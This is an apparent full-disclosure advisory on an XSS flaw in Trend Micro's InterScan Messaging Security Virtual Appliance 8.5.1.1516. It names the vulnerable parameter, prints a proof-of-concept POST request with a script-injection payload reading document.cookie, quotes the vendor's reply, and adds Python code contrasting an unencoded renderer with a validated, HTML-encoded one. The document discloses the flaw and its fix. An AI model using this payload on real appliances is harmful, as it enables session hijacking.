List:       full-disclosure
Subject:    [FD] XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance 8.5.1.1516 (Zero-DA
From:       William Costa <william.costa () gmail ! com>
Date:       2014-05-29 15:55:03
Message-ID: CAOmMdVs8T15nwk1maZn9sK5KbYKb_gut5A8o=JKoOUR+LFAZFw () mail ! gmail ! com

I. VULNERABILITY
-------------------------

XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance
8.5.1.1516

II. DESCRIPTION
-------------------------
An XSS vulnerability has been detected in InterScan Messaging Security
Virtual Appliance version 8.5.1.1516.
The code injection is done through the parameter "addWhiteListDomainStr",
sent via POST to the page "/addWhiteListDomain.imss".

III. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter
"addWhiteListDomainStr" correctly.


https://10.200.210.100:8445/addWhiteListDomain.imss

Host=10.200.210.100:8445
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=https://186.230.33.160/trend-interscan/trend.php
Cookie=JSESSIONID=68D4F0AEF4874173BDE77FAA4895231F; CurrentLocale=en-US; PHPSESSID=2ok068gfak8np5isbe5k5l4nf3; un=7164ceee6266e893181da6c33936e4a4; userID=1; LANG=en; wids=modImsvaSystemUseageWidget,modImsvaMailsQueueWidget,modImsvaQuarantineWidget,modImsvaArchiveWidget,; lastID=15; theme=default; lastTab=1; GetPageTab=1
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=95
POSTDATA=addWhiteListDomainStr=aaaa.com"><script>alert(document.cookie);</script>)


https://vimeo.com/96757096


IV. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in the context of a
targeted user's browser, which allows session hijacking.

V. SYSTEMS AFFECTED
-------------------------
Tested in InterScan Messaging Security Virtual Appliance 8.5.1.1516

VI. SOLUTION
------------------------

Answer from Trend.

Hi William,


According to our Product Developers, this is not a vulnerability of our
product. All of the cookies (not just IMSVA) can be stolen from a
compromised environment. It was highly suggested that you upgrade your
client to ensure safety.
Also, they recommended another Trend Micro Product - "OfficeScan" that may
be suitable for your environment.

I hope this information helps. Please let me know if you have additional
questions or clarifications.

Have a great day!



By William Costa
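
Added example, not part of the original advisory and not Trend Micro's code: one way a server-side handler could treat "addWhiteListDomainStr", validating it as a host name and HTML-encoding it wherever it is echoed, shown beside the unencoded rendering the advisory describes. The field markup, the function names and the "*." wildcard syntax are assumptions.

```python
import html
import re

# Constructed sample: the parameter value from the advisory's POSTDATA line.
ADVISORY_VALUE = 'aaaa.com"><script>alert(document.cookie);</script>)'

# One DNS label: 1-63 letters, digits or hyphens, no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def parse_domain(value):
    """Return the normalised domain, or None if value is not a plain host name.

    Assumption: a whitelist entry is a dotted host name with an optional
    leading "*." wildcard; the product's real entry grammar is not on the page.
    """
    value = value.strip().lower()
    host = value[2:] if value.startswith("*.") else value
    labels = host.split(".")
    if len(host) > 253 or len(labels) < 2:
        return None
    if not all(_LABEL.fullmatch(label) for label in labels):
        return None
    if labels[-1].isdigit():  # reject all-numeric TLDs such as IPv4 literals
        return None
    return value


def render_field_unencoded(raw):
    """The flaw as described: the value is echoed into the page as-is."""
    return f'<input name="addWhiteListDomainStr" value="{raw}">'


def render_field(raw):
    """Hardened form: validate first, and encode at output in every case."""
    error = "" if parse_domain(raw) else '<p class="err">Invalid domain</p>'
    # quote=True also encodes " and ', so the value cannot leave the attribute.
    safe = html.escape(raw, quote=True)
    return f'<input name="addWhiteListDomainStr" value="{safe}">{error}'


if __name__ == "__main__":
    print(render_field_unencoded(ADVISORY_VALUE))
    print(render_field(ADVISORY_VALUE))
```

Validation alone is not the fix: the encoding step is what keeps a rejected value inert when the form is redisplayed with an error.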
